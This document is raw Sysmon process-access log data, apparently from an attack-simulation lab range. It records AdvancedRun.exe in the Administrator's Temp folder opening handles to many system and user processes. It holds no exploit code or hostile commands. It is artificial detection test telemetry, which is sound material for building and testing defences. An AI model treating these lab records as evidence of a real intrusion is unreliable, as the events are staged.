20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.923{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.922{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.921{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.913{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.912{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.910{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.910{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.909{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.909{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.908{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:04:05.908{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004063640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
